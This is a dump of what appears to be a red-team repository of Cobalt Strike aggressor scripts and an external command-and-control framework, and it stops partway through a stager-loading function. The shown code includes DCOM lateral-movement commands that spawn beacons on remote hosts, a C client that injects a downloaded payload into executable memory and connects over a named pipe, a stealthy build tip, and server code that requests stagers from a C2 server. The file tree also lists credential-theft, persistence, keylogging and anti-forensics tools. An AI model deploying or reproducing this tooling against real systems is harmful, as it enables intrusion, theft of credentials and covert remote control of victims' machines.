├── 001SPARTaN ├── README.md ├── bot.cna ├── csfm │ ├── LICENSE │ ├── README.md │ ├── csfm.cna │ └── defs.cna ├── custom_defaults.cna ├── dcom_lateral_movement.cna ├── download_screenshots.cna ├── http.cna ├── powershell.cna ├── visualizations │ ├── logvis.cna │ └── vis.cna └── web.cna ├── README.md ├── RhinoSecurityLabs └── external_c2_framework │ ├── README.md │ └── builds │ ├── client │ └── s3 │ │ ├── c2file_dll.c │ │ ├── c2file_dll.h │ │ ├── compile_dll.sh │ │ └── s3_client.py │ ├── server │ ├── config.py │ ├── configureStage │ │ └── __init__.py │ ├── establishedSession │ │ └── __init__.py │ ├── s3_server.py │ └── utils │ │ ├── commonUtils.py │ │ ├── encoders │ │ ├── encoder_b64url.py │ │ └── encoder_base64.py │ │ └── transports │ │ └── transport_s3.py │ └── start_externalc2.cna ├── Und3rf10w ├── Ebowla │ └── ebowla-interop.cna ├── Pushover │ ├── pushover-cs │ └── pushover.cna ├── Reports │ └── knightlab-timeline.rpt ├── auto-keylogger.cna ├── external_c2_framework │ ├── README.md │ └── builds │ │ ├── client │ │ ├── gmail │ │ │ ├── c2file_dll.c │ │ │ ├── c2file_dll.h │ │ │ ├── compile_dll.sh │ │ │ └── gmail_client.py │ │ └── raw_socket │ │ │ ├── c2file_dll.c │ │ │ ├── c2file_dll.h │ │ │ ├── compile_dll.sh │ │ │ └── raw_socket_client.py │ │ ├── server │ │ ├── config.py │ │ ├── configureStage │ │ │ └── __init__.py │ │ ├── establishedSession │ │ │ └── __init__.py │ │ ├── sample_server-gmail.py │ │ ├── sample_server-raw_socket.py │ │ └── utils │ │ │ ├── commonUtils.py │ │ │ ├── encoders │ │ │ ├── encoder_b64url.py │ │ │ └── encoder_base64.py │ │ │ └── transports │ │ │ ├── transport_gmail.py │ │ │ └── transport_raw_socket.py │ │ └── start_externalc2.cna ├── inveigh │ └── inveigh.cna ├── kits │ ├── AnnoyKit │ │ ├── AnnoyKit.cna │ │ └── scripts │ │ │ ├── Open-HiddenInternetExplorer.ps1 │ │ │ └── annoySongs │ │ │ ├── Play-ImperialMarch.ps1 │ │ │ ├── Play-RickAstley.ps1 │ │ │ └── Play-TetrisTune.ps1 │ ├── AntiForensicsKit │ │ ├── AntiForensicsKit.cna │ │ └── scripts │ │ 
│ ├── Block-CarbonBlack.ps1 │ │ │ ├── Check-VM.ps1 │ │ │ └── Invoke-Phant0m.ps1 │ ├── CredKit │ │ ├── CredKit.cna │ │ └── scripts │ │ │ ├── Get-ChromePasswords.ps1 │ │ │ ├── Get-FirefoxPasswords.ps1 │ │ │ ├── Get-VaultCredential.ps1 │ │ │ ├── Invoke-mimikittenz.ps1 │ │ │ ├── KeePassConfig.ps1 │ │ │ └── KeeThief.ps1 │ ├── DebugKit │ │ └── DebugKit.cna │ ├── EnumKit │ │ ├── EnumKit.cna │ │ └── scripts │ │ │ ├── BloodHound.ps1 │ │ │ ├── Get-MicrophoneAudio.ps1 │ │ │ └── PowerView.ps1 │ ├── KitLoader.cna │ ├── PersistKit │ │ ├── PersistKit.cna │ │ └── scripts │ │ │ ├── Invoke-ADSBackdoor.ps1 │ │ │ └── Persist-Poweliks.ps1 │ ├── PrivescKit │ │ ├── PrivescKit.cna │ │ └── scripts │ │ │ ├── LinEnum.sh │ │ │ ├── PowerUp.ps1 │ │ │ └── unix-privesc-check │ └── ThirdParty │ │ └── thirdparty.cna └── webservice.sl ├── ZonkSec ├── README.md └── persistence.cna ├── bluscreenofjeff ├── Beaconpire │ ├── README.md │ └── beaconpire.cna ├── CCDC │ ├── Clippy Setup Instructions.txt │ ├── lulz.cna │ ├── misc.cna │ └── sysinternal-killer.cna ├── LICENSE ├── OPSEC Profiles │ ├── README.md │ ├── cmd-execution.cna │ ├── powershell.cna │ ├── process-execution.cna │ ├── process-injection.cna │ ├── service-creation.cna │ └── template.cna ├── README.md ├── apache-style-weblog-output.cna ├── beacon_to_empire.cna ├── beaconestablishednote.cna ├── beaconid_note.cna ├── checkin_jobs_context.cna ├── eventlog-to-slack.cna ├── forcecheckin.cna ├── mass-dcsync.cna ├── mimikatz-every-30m.cna ├── mimikatz-timestamp-note-BETA.cna ├── ping_aliases.cna ├── powershell.cna ├── ps-window-alias.cna ├── silver-tickets.cna ├── slack-notify-beacon.cna ├── slack-notify-webhit.cna ├── sleep-down-when-no-operators.cna ├── sleeptimer.cna ├── stale-beacon-notifier.cna └── timestamped_activitylog_export.cna ├── harleyQu1nn ├── AVQuery.cna ├── All_In_One.cna ├── ArtifactPayloadGenerator.cna ├── CertUtilWebDelivery.cna ├── EDR.cna ├── Logging │ ├── Logger.cna │ ├── README.md │ ├── av_hips_executables.txt │ └── logs.py ├── 
Persistence │ ├── HKCURunKeyPSRegistryPersist.cna │ ├── HKLMRunKeyPSRegistryPersist.cna │ ├── Persistence_Menu.cna │ ├── README.md │ ├── RegistryPersist.cna │ ├── ServiceEXEPersist.cna │ ├── StartUpFolderPersist.cna │ ├── StartupGPOPersist.cna │ ├── UserSchtasksPersist.cna │ ├── WMICEventPersist.cna │ └── WMIEventPersist.cna ├── ProcessColor.cna ├── ProcessMonitor.cna ├── ProcessMonitor.ps1 ├── README.md ├── RedTeamRepo.cna └── logvis.cna ├── killswitch-GUI ├── CheckLAdminContext.ps1 ├── DA-Watch.cna ├── Initial-DACheck.cna ├── Initial-LAdminCheck.cna ├── Invoke-DACheck.ps1 ├── LICENSE ├── README.md └── host │ └── dnscheckin.cna ├── ramen0x3f ├── LICENSE ├── README.md ├── cdolla.cna ├── compromised_log.rpt ├── credpocalypse.cna ├── save_log.cna └── utils.cna ├── rasta-mouse ├── DDEAutoCS │ ├── LICENSE │ ├── README.md │ ├── ddeauto.cna │ └── img │ │ ├── Git.png │ │ └── Git2.png ├── README.md ├── elevate │ ├── README.md │ ├── elevate.cna │ └── modules │ │ ├── Invoke-MS16032.ps1 │ │ ├── Invoke-MS16135.ps1 │ │ ├── cve-2015-1701.x64.dll │ │ ├── cve-2015-1701.x86.dll │ │ └── cve-2016-0051.x86.dll ├── loader.cna └── persistence │ ├── README.md │ ├── images │ ├── hkcu_psh.png │ └── service.png │ ├── modules │ ├── Invoke-ServicePersistence.ps1 │ └── PSReflect.ps1 │ └── persistence.cna ├── rvrsh3ll ├── AVQuery.cna ├── All_In_One.cna ├── ArtifactPayloadGenerator.cna ├── CertUtilWebDelivery.cna ├── Logging │ ├── Logger.cna │ ├── README.md │ ├── av_hips_executables.txt │ └── logs.py ├── Persistence │ ├── HKCURunKeyPSRegistryPersist.cna │ ├── HKLMRunKeyPSRegistryPersist.cna │ ├── Persistence_Menu.cna │ ├── README.md │ ├── RegistryPersist.cna │ ├── ServiceEXEPersist.cna │ ├── StartUpFolderPersist.cna │ ├── StartupGPOPersist.cna │ ├── UserSchtasksPersist.cna │ ├── WMICEventPersist.cna │ └── WMIEventPersist.cna ├── ProcessColor.cna ├── ProcessMonitor.cna ├── ProcessMonitor.ps1 ├── README.md └── RedTeamRepo.cna ├── tevora-threat ├── PowerView.cna └── README.md └── vysec ├── 
ANGRYPUPPY ├── ANGRYPUPPY.cna ├── Install.ps1 ├── Install.sh ├── LICENSE ├── README.md ├── com-exec.cna ├── cypher.cna ├── eventspy.cna ├── json │ ├── LICENSE │ └── json.jar └── utils.cna ├── Blacklist.cna ├── CACTUSTORCH ├── CACTUSTORCH.cna ├── CACTUSTORCH.cs │ └── TestClass.cs ├── CACTUSTORCH.hta ├── CACTUSTORCH.js ├── CACTUSTORCH.jse ├── CACTUSTORCH.sct ├── CACTUSTORCH.vba ├── CACTUSTORCH.vbe ├── CACTUSTORCH.vbs ├── README.md ├── banner.txt └── splitvba.py ├── Invoke-CredLeak.ps1 ├── Invoke-Vnc.ps1 ├── README.md ├── auto-keylog-consent.cna ├── auto-prepenv.cna ├── credleak.cna ├── http.cna ├── mimikatz_addons.cna ├── ping.cna ├── portfwd.cna ├── pushover-ng.cna ├── test.cna ├── virustotal-ng.cna └── vnc-psh.cna /001SPARTaN/README.md: -------------------------------------------------------------------------------- 1 | # aggressor_scripts 2 | A collection of useful scripts for Cobalt Strike 3 | 4 | This repository will contain all the aggressor scripts that I feel are useful enough to warrant making public. 5 | 6 | **powershell.cna** is a script to import and run some commonly used Powershell tools via a Beacon menu or from the Beacon console. 7 | 8 | **bot.cna** is a little chat bot for the Cobalt Strike event log. Commands include !ping, !beacons, !listeners, !elevate, !screenshot, !downloadstring and !psexec. NOTE: This is intended to be run headless (with ./agscript). 9 | 10 | **dcom_lateral_movement.cna** is an implementation of enigma0x3's research into code execution via DCOM. 11 | https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ 12 | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 13 | 14 | **ElevateKit** is forked from rsmudge, and I've added right click menu options for the privilege escalation techniques included in ElevateKit. 
15 | -------------------------------------------------------------------------------- /001SPARTaN/csfm/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 001SPARTaN and r3dqu1nn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /001SPARTaN/csfm/README.md: -------------------------------------------------------------------------------- 1 | # CSFM 2 | Cobalt Strike Field Manual - A quick reference for Windows commands that can be accessed in a beacon console. 3 | 4 | # Getting started 5 | CSFM allows users to reference commands from any beacon console. Simply type `search ` into a beacon, and you'll see a list of results that match that term. 
6 | 7 | Once you have identified the command you want to run, you can run it easily with `runcmd <search result>`, where `<search result>` is the number next to the search result. 8 | 9 | # Usage 10 | CSFM has 4 different options to choose from: 11 | 12 | `search <term>` 13 | 14 | `tip ` 15 | 16 | `runcmd (search result)` 17 | 18 | `add` 19 | 20 | The add command will pop up a dialog window with fields to enter the command syntax, the description of the command, and the tags or matching search terms for that specific command. Once the command is added it will be stored in the file 'defs.bin' for later use on future engagements. 21 | 22 | For any questions or issues, please post here: https://github.com/001SPARTaN/csfm/issues or feel free to reach out to @r3dQu1nn or @001SPARTaN. 23 | 24 | ![image](https://user-images.githubusercontent.com/27856212/32573478-576bf1e4-c48b-11e7-8b06-d56a47f93c6e.png) 25 | ![csfm2](https://user-images.githubusercontent.com/27856212/32573605-c7422416-c48b-11e7-953c-98b6a6fd2ce5.PNG) 26 | ![screenshot](https://i.imgur.com/KhjRYzh.png) 27 | -------------------------------------------------------------------------------- /001SPARTaN/custom_defaults.cna: -------------------------------------------------------------------------------- 1 | # Some of my defaults for Cobalt Strike. 
2 | # 001SPARTaN 3 | 4 | # Keyboard shortcuts 5 | bind Meta+Right { 6 | nextTab(); 7 | } 8 | 9 | bind Meta+Left { 10 | previousTab(); 11 | } 12 | 13 | bind Ctrl+Tab { 14 | nextTab(); 15 | } 16 | 17 | # Load scripts 18 | include(script_resource("powershell.cna")); 19 | include(script_resource("ElevateKit/elevate.cna")); 20 | 21 | # Change default event log 22 | set EVENT_SBAR_RIGHT { 23 | # Add number of beacons to event log status bar 24 | $beacons = size(beacons()); 25 | return "[\c9Beacons: $beacons\o | lag: $1 $+ ]"; 26 | } 27 | 28 | on beacon_initial { 29 | if (-isadmin $1) { 30 | exec("say -v Fiona 'New admin beacon!'"); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /001SPARTaN/dcom_lateral_movement.cna: -------------------------------------------------------------------------------- 1 | # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) 2 | # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ 3 | # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 4 | # Beacon implementation based on comexec.cna by Raphael Mudge 5 | # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 6 | 7 | # Register alias 8 | beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", 9 | "Usage: dcom_shellexecute [target] [listener]\n\n" . 10 | "Spawn new Beacon on a target via DCOM ShellExecute Object."); 11 | 12 | # Alias for dcom_shellexecute 13 | alias dcom_shellexecute { 14 | if ($3 is $null) { 15 | # If no listener specified, allow user to choose 16 | openPayloadHelper(lambda({ 17 | dcom_shellexecute($bid, $target, $1); 18 | }, $bid => $1, $target => $2)); 19 | } 20 | else { 21 | dcom_shellexecute($1, $2, $3); 22 | } 23 | } 24 | 25 | sub dcom_shellexecute { 26 | local('$payload $cmd'); 27 | 28 | # Acknowledge task 29 | btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . 
") via DCOM ShellExecute"); 30 | 31 | # Generate PowerShell one-liner for payload 32 | $payload = powershell($3, true, "x86"); 33 | $payload = strrep($payload, "powershell.exe ", ""); 34 | 35 | # Create new DCOM ShellExecute object on remote host 36 | $cmd = '[Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "'; 37 | $cmd .= $2; 38 | $cmd .= '")).Item().Document.Application.ShellExecute("powershell.exe", "'; 39 | $cmd .= $payload; 40 | $cmd .= '", "C:\Windows\System32\WindowsPowershell\v1.0",'; 41 | $cmd .= '$null,0)'; 42 | 43 | # Use beacon_host_script to generate a shorter DownloadString 44 | # payload that we can use w/ make_token 45 | $short = beacon_host_script($1, $cmd); 46 | 47 | bpowershell($1, $short); 48 | } 49 | 50 | # DCOM Outlook remote code execution. 51 | sub dcom_outlook { 52 | local('$payload $cmd'); 53 | 54 | # Acknowledge task 55 | btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM Outlook"); 56 | 57 | # Generate PowerShell one-liner for payload 58 | $payload = powershell($3, true, "x86"); 59 | $payload = strrep($payload, "powershell.exe ", ""); 60 | 61 | $cmd = "[System.Activator]::CreateInstance([Type]::GetTypeFromProgID('Outlook.Application').CreateObject(\"ScriptControl\")"; 62 | 63 | # Use beacon_host_script to generate a shorter DownloadString 64 | # payload that we can use w/ make_token 65 | $short = beacon_host_script($1, $cmd); 66 | 67 | bpowershell($1, $short); 68 | } -------------------------------------------------------------------------------- /001SPARTaN/download_screenshots.cna: -------------------------------------------------------------------------------- 1 | # Grab all screenshots and download 2 | # 001SPARTaN 3 | 4 | sub getScreenshots { 5 | # Iterate through screenshots 6 | foreach %s (screenshots()) { 7 | # Each screenshot is stored as 8 | # %(data => , bid => , when => ) 9 | $bid = %s['bid']; 10 | # Pull computer name, timestamp so we can name files 
appropriately 11 | $computer = binfo($bid, "computer"); 12 | $timestamp = %s['when']; 13 | # Pull data so that we can write to file 14 | $data = %s['data']; 15 | 16 | # Filename is COMPUTERNAME_TIMESTAMP.jpg 17 | $fname = $computer . "_" . $timestamp . ".jpg"; 18 | # Open file for writing as $handle 19 | # Change to whatever directory you want (e.g. '>engagement/screenshots/$fname') 20 | $handle = openf(">$fname"); 21 | # Write $data to the file handle 22 | writeb($handle, $data); 23 | # Close file handle 24 | closef($handle); 25 | println("Saving screenshot: " . $fname); 26 | } 27 | } 28 | 29 | # Add item to the "Cobalt Strike" menu 30 | popup aggressor { 31 | item "Download Screenshots" { 32 | getScreenshots(); 33 | } 34 | } -------------------------------------------------------------------------------- /001SPARTaN/http.cna: -------------------------------------------------------------------------------- 1 | # http.cna 2 | # utilities for http requests from Aggressor scripts 3 | # 001SPARTaN 4 | 5 | sub http_get { 6 | local('$output'); 7 | $url = [new java.net.URL: $1]; 8 | $stream = [$url openStream]; 9 | $handle = [SleepUtils getIOHandle: $stream, $null]; 10 | 11 | @content = readAll($handle); 12 | 13 | foreach $line (@content) { 14 | $output .= $line . "\r\n"; 15 | } 16 | 17 | println($output); 18 | } 19 | 20 | http_get("https://ipinfo.io/json"); 21 | 22 | sub http_post { 23 | local('$output'); 24 | $url = [new java.net.URL: $1]; 25 | $conn = [$url openConnection]; 26 | [$conn setDoOutput: true]; 27 | $payload = "testing"; 28 | println("Payload: $payload"); 29 | println("Content-Length: " . 
strlen($payload)); 30 | [$conn setRequestProperty: "Content-Length", strlen($payload)]; 31 | [$conn setRequestProperty: "Content-Type", "text/plain"]; 32 | 33 | $handle = [SleepUtils getIOHandle: [$conn getInputStream], [$conn getOutputStream]]; 34 | 35 | println($handle, $payload); 36 | 37 | @content = readAll($handle); 38 | 39 | foreach $line (@content) { 40 | $output .= $line . "\r\n"; 41 | } 42 | 43 | println($output); 44 | } 45 | 46 | http_post("http://localhost/test?param=param1"); -------------------------------------------------------------------------------- /001SPARTaN/powershell.cna: -------------------------------------------------------------------------------- 1 | # This Aggressor script loads some commonly used PowerShell tools, and adds menu bindings 2 | # 001SPARTaN 3 | 4 | #### RECON 5 | 6 | ## BloodHound 7 | 8 | # Run BloodHound with default settings 9 | sub bloodhound { 10 | bpowershell_import($1, script_resource("scripts/BloodHound.ps1")); # Change path to suit 11 | bcd($1, "C:\\Temp"); 12 | bpowershell($1, "Invoke-BloodHound"); 13 | } 14 | 15 | # Collect only sessions 16 | sub bloodhoundSessionsOnly { 17 | bpowershell_import($1, script_resource("scripts/BloodHound.ps1")); 18 | bcd($1, "C:\\Temp"); 19 | bpowershell($1, "Invoke-BloodHound -CollectionMethod Session"); 20 | } 21 | 22 | # Alias to run BloodHound from Beacon quickly 23 | alias bloodhound { 24 | bloodhound($1); 25 | } 26 | 27 | # Alias to run BloodHound session collection 28 | alias bloodhound_sessions { 29 | sessionsOnly($1); 30 | } 31 | 32 | ## Inveigh 33 | 34 | # Run Invoke-Inveigh for 60 minutes 35 | sub inveigh { 36 | local('$bid'); 37 | $bid = $1; 38 | bpowershell_import($bid, script_resource("scripts/Inveigh.ps1")); 39 | bcd($bid, "C:\\Temp"); 40 | bpowershell($bid, "Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -RunTime 60"); 41 | } 42 | 43 | alias inveigh { 44 | inveigh($1); 45 | } 46 | 47 | sub sessionGopher { 48 | local('$bid'); 49 | $bid = $1; 50 | 
bpowershell_import($bid, script_resource("scripts/SessionGopher.ps1")); 51 | bcd($bid, "C:\\Temp"); 52 | bpowershell($bid, "Invoke-SessionGopher -o"); 53 | } 54 | 55 | alias session_gopher { 56 | session_gopher($1); 57 | } 58 | 59 | #### PRIVESC 60 | # Run PowerUp Invoke-AllChecks 61 | sub powerup { 62 | bpowershell_import($1, script_resource("scripts/PowerUp.ps1")); 63 | bpowershell($1, "Invoke-AllChecks"); 64 | } 65 | 66 | alias powerup { 67 | powerup($1); 68 | } 69 | 70 | # Add bindings to Beacon menu 71 | popup beacon_bottom { 72 | menu "P&owershell" { 73 | menu "&Recon" { 74 | item "BloodHound" { 75 | local('$bid'); 76 | foreach $bid ($1) { 77 | bloodhound ($bid); 78 | } 79 | } 80 | item "BloodHound (Sessions)" { 81 | local('$bid'); 82 | foreach $bid ($1) { 83 | bloodhoundSessionsOnly($bid); 84 | } 85 | } 86 | separator(); 87 | item "Inveigh" { 88 | local('$bid'); 89 | foreach $bid ($1) { 90 | inveigh($bid); 91 | } 92 | } 93 | separator(); 94 | item "SessionGopher" { 95 | local ('$bid'); 96 | foreach $bid ($1) { 97 | sessionGopher($bid) 98 | } 99 | } 100 | } 101 | menu "&PrivEsc" { 102 | item "PowerUp" { 103 | local ('$bid'); 104 | foreach $bid ($1) { 105 | powerup($bid); 106 | } 107 | } 108 | } 109 | } 110 | } 111 | -------------------------------------------------------------------------------- /001SPARTaN/visualizations/vis.cna: -------------------------------------------------------------------------------- 1 | # vis.cna 2 | # Experimenting with custom visualizations in Aggressor Script 3 | # Doesn't really do much right now 4 | # @001SPARTaN 5 | 6 | import java.awt.*; 7 | import java.awt.event.*; 8 | import javax.swing.*; 9 | import javax.swing.event.*; 10 | import javax.swing.table.*; 11 | 12 | import ui.*; 13 | import table.*; 14 | 15 | 16 | global('$model $console'); 17 | 18 | sub updateHosts { 19 | fork({ 20 | local('$entry'); 21 | 22 | # Clear the model so we can put new stuff in it. 
23 | [$model clear: 256]; 24 | 25 | foreach $b (beacons()) { 26 | %entry["user"] = $b['user']; 27 | %entry["host"] = $b['computer']; 28 | %entry["bid"] = $b['id']; 29 | # Add the new entry to $model 30 | [$model addEntry: %entry]; 31 | } 32 | # Update with the new table 33 | [$model fireListeners]; 34 | }, \$model); 35 | } 36 | 37 | sub updateConsole { 38 | $msg = $1; 39 | # Append our message to $console 40 | [$console append: $msg]; 41 | } 42 | 43 | sub createVisualization { 44 | # GenericTableModel from table.* 45 | $model = [new GenericTableModel: @("user", "host", "bid"), "bid", 16]; 46 | 47 | # Create a table from the GenericTableModel 48 | $table = [new ATable: $model]; 49 | 50 | # Controls how the column headers will sort the table 51 | $sorter = [new TableRowSorter: $model]; 52 | [$sorter toggleSortOrder: 0]; 53 | # We have to use cmp for comparing user, because it's a text string 54 | [$sorter setComparator: 0, { 55 | return $1 cmp $2; 56 | }]; 57 | # Builtin compareHosts function allows us to sort by host 58 | [$sorter setComparator: 1, &compareHosts]; 59 | # <=> works fine to compare bid, because they're just numbers 60 | [$sorter setComparator: 2, { 61 | return $1 <=> $2; 62 | }]; 63 | 64 | # Set $sorter as the row sorter for $table 65 | [$table setRowSorter: $sorter]; 66 | 67 | # console.Display from ui.* 68 | # Because it looks better than a boring text area 69 | $console = [new console.Display]; 70 | 71 | # Create a split pane (divider you can drag around) 72 | $content = [new JSplitPane: [JSplitPane HORIZONTAL_SPLIT], [new JScrollPane: $table], $console]; 73 | 74 | # Make spacing look nice by adjusting the split location 75 | [$content setDividerLocation: 450]; 76 | 77 | updateHosts(); 78 | 79 | # Register the visualization with CS 80 | addVisualization("Custom", $content); 81 | } 82 | 83 | createVisualization(); 84 | 85 | on beacon_initial { 86 | updateHosts(); 87 | $user = beacon_info($1, "user"); 88 | $host = beacon_info($1, "computer"); 89 | 
updateConsole("[BEACON] - ID: \c3$1\c\n"); 90 | updateConsole("[BEACON] - USER: \c3$user\c\n"); 91 | } 92 | 93 | on web_hit { 94 | updateConsole("[WEB] - Source: \c4$3\c\n"); 95 | } 96 | 97 | # Add an item to the View menu to show our new visualization 98 | popup view { 99 | item "Custom" { 100 | # Show the visualization 101 | showVisualization("Custom"); 102 | } 103 | } -------------------------------------------------------------------------------- /001SPARTaN/web.cna: -------------------------------------------------------------------------------- 1 | # web.cna 2 | 3 | $template = ""; 4 | 5 | sub loadTemplate { 6 | $handle = openf(script_resource("test.html")); 7 | @array = readAll($handle); 8 | closef($handle); 9 | 10 | foreach $line (@array) { 11 | println($line); 12 | $template .= $line . "\n"; 13 | } 14 | 15 | println("Loaded template."); 16 | } 17 | 18 | sub hostPage { 19 | $page = $template; 20 | %replace = %( 21 | TEST => "Whee!", 22 | asdf => "Bleh" 23 | ); 24 | 25 | foreach $key (keys(%replace)) { 26 | $value = %replace["$key"]; 27 | println("Replacing $key with $value"); 28 | $page = replace($page, "##$key\#\#", $value); 29 | } 30 | 31 | site_kill(80, "/test"); 32 | site_host(localip(), 80, "/test", $page, "text/html", "Testing", false); 33 | } 34 | 35 | loadTemplate(); 36 | hostPage(); -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/client/s3/c2file_dll.c: -------------------------------------------------------------------------------- 1 | /* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #define PAYLOAD_MAX_SIZE 512 * 1024 8 | #define BUFFER_MAX_SIZE 1024 * 1024 9 | 10 | 11 | /* read a frame from a handle */ 12 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) { 13 | DWORD size = 0, temp = 0, total = 0; 14 | /* read the 4-byte length */ 15 | 
ReadFile(my_handle, (char * ) & size, 4, & temp, NULL); 16 | 17 | /* read the whole thing in */ 18 | while (total < size) { 19 | // xychix added 1 line 20 | Sleep(3000); 21 | ReadFile(my_handle, buffer + total, size - total, & temp, NULL); 22 | total += temp; 23 | } 24 | return size; 25 | } 26 | 27 | /* write a frame to a file */ 28 | DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) { 29 | DWORD wrote = 0; 30 | printf("in write_frame we have: %s",buffer); 31 | WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL); 32 | return WriteFile(my_handle, buffer, length, & wrote, NULL); 33 | //return wrote; 34 | } 35 | 36 | HANDLE start_beacon(char * payload, unsigned int pylen){ 37 | DWORD length = (DWORD) pylen; 38 | /* inject the payload stage into the current process */ 39 | char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | memcpy(payloadE, payload, length); 41 | printf("Injecting Code, %d bytes\n", length); 42 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL); 43 | /* 44 | * connect to our Beacon named pipe */ 45 | HANDLE handle_beacon = INVALID_HANDLE_VALUE; 46 | while (handle_beacon == INVALID_HANDLE_VALUE) { 47 | handle_beacon = CreateFileA("\\\\.\\pipe\\foobar", 48 | GENERIC_READ | GENERIC_WRITE, 49 | 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); 50 | 51 | } 52 | return(handle_beacon); 53 | } -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/client/s3/c2file_dll.h: -------------------------------------------------------------------------------- 1 | #ifndef c2file_H__ 2 | #define c2file_H__ 3 | 4 | DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) 5 | void write_frame(HANDLE my_handle, char * buffer, DWORD length) 6 | HANDLE start_beacon(char * payload, DWORD length) 7 | 8 | #endif -------------------------------------------------------------------------------- 
/RhinoSecurityLabs/external_c2_framework/builds/client/s3/compile_dll.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll 3 | python -m PyInstaller -F -r c2file.dll s3_client.py 4 | echo '[=] Complete. Distribute dist/s3_client.exe to clients as required.' 5 | echo '-----------------------' 6 | echo '| NOTE |' 7 | echo '----------------------' 8 | echo 'This is compiled unobfuscated. To create a more stealthy version, use:' 9 | echo 'python -m PyInstaller --no-console --key=SomeSixteenChars -F -r c2file.dll s3_client.py' 10 | echo -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/config.py: -------------------------------------------------------------------------------- 1 | # TODO: Have a proper function that reads in a config 2 | 3 | # DEBUG: 4 | ############################################ 5 | ############################################ 6 | # Address of the External C2 server 7 | EXTERNAL_C2_ADDR = "127.0.0.1" 8 | 9 | # Port of the External C2 server 10 | EXTERNAL_C2_PORT = "2222" 11 | 12 | # The name of the pipe that the beacon should use 13 | C2_PIPE_NAME = "foobar" 14 | 15 | # A time in milliseconds that indicates how long the External C2 server should block when no new tasks are available 16 | C2_BLOCK_TIME = 100 17 | 18 | # Desired architecture of the Beacon 19 | C2_ARCH = "x86" 20 | 21 | # How long to wait (in seconds) before polling the server for new tasks/responses 22 | IDLE_TIME = 5 23 | 24 | ENCODER_MODULE = "encoder_b64url" 25 | TRANSPORT_MODULE = "transport_s3" 26 | 27 | ########################################### 28 | # DEBUG: 29 | 30 | # Anything taken in from argparse that you want to make available goes here: 31 | verbose = False 32 | debug = False --------------------------------------------------------------------------------
/RhinoSecurityLabs/external_c2_framework/builds/server/configureStage/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def configureOptions(sock, arch, pipename, block): 5 | # This whole function should eventually be refactored into an elaborate forloop so that we can 6 | # support additional beacon options down the road 7 | # send the options 8 | if config.verbose: 9 | print commonUtils.color("Configuring stager options") 10 | 11 | beacon_arch = "arch=" + str(arch) 12 | if config.debug: 13 | print commonUtils.color(beacon_arch, status=False, yellow=True) 14 | commonUtils.sendFrameToC2(sock, beacon_arch) 15 | 16 | beacon_pipename = "pipename=" + str(pipename) 17 | if config.debug: 18 | print commonUtils.color(beacon_pipename, status=False, yellow=True) 19 | commonUtils.sendFrameToC2(sock, beacon_pipename) 20 | 21 | beacon_block = "block=" + str(block) 22 | if config.debug: 23 | print commonUtils.color(beacon_block, status=False, yellow=True) 24 | commonUtils.sendFrameToC2(sock, beacon_block) 25 | 26 | def requestStager(sock): 27 | commonUtils.sendFrameToC2(sock, "go") 28 | 29 | stager_payload = commonUtils.recvFrameFromC2(sock) 30 | 31 | return stager_payload 32 | 33 | def loadStager(sock, beaconId): 34 | # Send options to the external_c2 server 35 | configureOptions(sock, config.C2_ARCH, config.C2_PIPE_NAME, config.C2_BLOCK_TIME) 36 | 37 | if config.debug: 38 | print commonUtils.color("stager configured, sending 'go'", status=False, yellow=True) 39 | 40 | # Request stager 41 | stager_payload = requestStager(sock) 42 | 43 | if config.debug: 44 | print (commonUtils.color("STAGER: ", status=False, yellow=True) + "%s") % (stager_payload) 45 | 46 | # Prep stager payload 47 | if config.verbose: 48 | print commonUtils.color("Encoding stager payload") 49 | 